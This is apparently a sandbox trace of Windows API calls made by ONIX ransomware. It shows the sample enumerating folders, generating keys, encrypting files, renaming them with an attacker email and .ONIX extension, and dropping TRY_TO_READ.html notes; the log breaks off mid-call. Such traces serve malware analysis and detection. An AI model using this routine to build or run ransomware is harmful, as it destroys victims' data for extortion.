[0122.655] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.655] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.656] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.656] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Videos9c354ca09c354b444c.lock") returned 46 [0122.656] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\videos9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.656] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.656] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4d80 [0122.656] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Videos\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x329b73d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0c40 [0122.657] FindNextFileW (in: hFindFile=0x4e0c40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x329b73d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.657] FindNextFileW (in: hFindFile=0x4e0c40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.657] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x504 [0122.657] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.657] LockFile (hFile=0x504, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.657] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.657] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.657] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.657] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.657] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.657] lstrlenW (lpString="C:\\\\Users\\Public\\Videos\\desktop.ini") returned 35 [0122.657] GetProcessHeap () returned 0x410000 [0122.657] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb6) returned 0x46e9d8 [0122.657] lstrcpyW (in: lpString1=0x46e9d8, lpString2="C:\\\\Users\\Public\\Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini") returned="C:\\\\Users\\Public\\Videos\\desktop.ini" [0122.658] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.658] GetFileSizeEx (in: hFile=0x504, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=380) returned 1 [0122.658] SetFilePointer (in: hFile=0x504, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17c [0122.658] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.658] GetProcessHeap () returned 0x410000 [0122.658] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.658] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.658] WriteFile (in: hFile=0x504, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.662] WriteFile (in: hFile=0x504, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.663] WriteFile (in: hFile=0x504, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x46a198 [0122.664] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x4e1b68 [0122.664] SetFilePointer (in: hFile=0x504, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.664] ReadFile (in: hFile=0x504, lpBuffer=0x46a198, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a198*, lpNumberOfBytesRead=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.664] SetFilePointer (in: hFile=0x504, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.664] WriteFile (in: hFile=0x504, lpBuffer=0x4e1b68*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesWritten=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.665] UnlockFile (hFile=0x504, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.665] CloseHandle (hObject=0x504) returned 1 [0122.666] GetProcessHeap () returned 0x410000 [0122.666] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.666] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\videos\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.670] GetProcessHeap () returned 0x410000 [0122.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e9d8 | out: hHeap=0x410000) returned 1 [0122.670] FindNextFileW (in: hFindFile=0x4e0c40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0122.670] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\videos\\sample videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0122.671] FindNextFileW (in: hFindFile=0x4e0c40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329b73d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x52958c70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.671] FindNextFileW (in: hFindFile=0x4e0c40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329b73d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x52958c70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.671] CloseHandle (hObject=0x3cc) returned 1 [0122.671] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbe) returned 0x473050 [0122.672] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x2, wMilliseconds=0x34)) [0122.672] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.672] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.672] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.672] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en9c354ca09c354b444c.lock") returned 95 [0122.672] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.672] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.673] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.673] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x4decd0 [0122.673] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0c80 [0122.673] FindNextFileW (in: hFindFile=0x4e0c80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.673] FindNextFileW (in: hFindFile=0x4e0c80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0122.673] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x508 [0122.674] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.674] LockFile (hFile=0x508, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaf35ed, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.674] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.674] ReadFile (in: hFile=0x508, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.676] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.676] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.676] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.676] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.676] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", dwFileAttributes=0x80) returned 1 [0122.676] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 82 [0122.676] GetProcessHeap () returned 0x410000 [0122.676] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0122.676] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" [0122.676] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.676] GetFileSizeEx (in: hFile=0x508, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=11482605) returned 1 [0122.677] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaf35ed [0122.677] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.677] GetProcessHeap () returned 0x410000 [0122.677] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.677] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.677] WriteFile (in: hFile=0x508, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.679] WriteFile (in: hFile=0x508, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.680] WriteFile (in: hFile=0x508, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.681] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaf35ed) returned 0x3680020 [0122.681] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaf35ed) returned 0x4180020 [0122.682] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.682] ReadFile (in: hFile=0x508, lpBuffer=0x3680020, nNumberOfBytesToRead=0xaf35ed, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0xaf35ed, lpOverlapped=0x0) returned 1 [0123.548] UnlockFile (hFile=0x508, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaf35ed, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0123.548] CloseHandle (hObject=0x508) returned 1 [0123.549] GetProcessHeap () returned 0x410000 [0123.549] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0123.549] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0123.552] GetProcessHeap () returned 0x410000 [0123.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0123.552] FindNextFileW (in: hFindFile=0x4e0c80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0123.552] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x508 [0123.552] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0123.553] LockFile (hFile=0x508, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd5c00, nNumberOfBytesToLockHigh=0x0) returned 1 [0123.553] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.553] ReadFile (in: hFile=0x508, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0123.555] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.555] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.555] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0123.555] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0123.555] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", dwFileAttributes=0x80) returned 1 [0123.555] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 82 [0123.555] GetProcessHeap () returned 0x410000 [0123.555] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0123.555] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" [0123.555] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0123.555] GetFileSizeEx (in: hFile=0x508, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=875520) returned 1 [0123.555] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd5c00 [0123.555] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0123.555] GetProcessHeap () returned 0x410000 [0123.555] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0123.555] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0123.556] WriteFile (in: hFile=0x508, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0123.557] WriteFile (in: hFile=0x508, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0123.558] WriteFile (in: hFile=0x508, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0123.559] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, 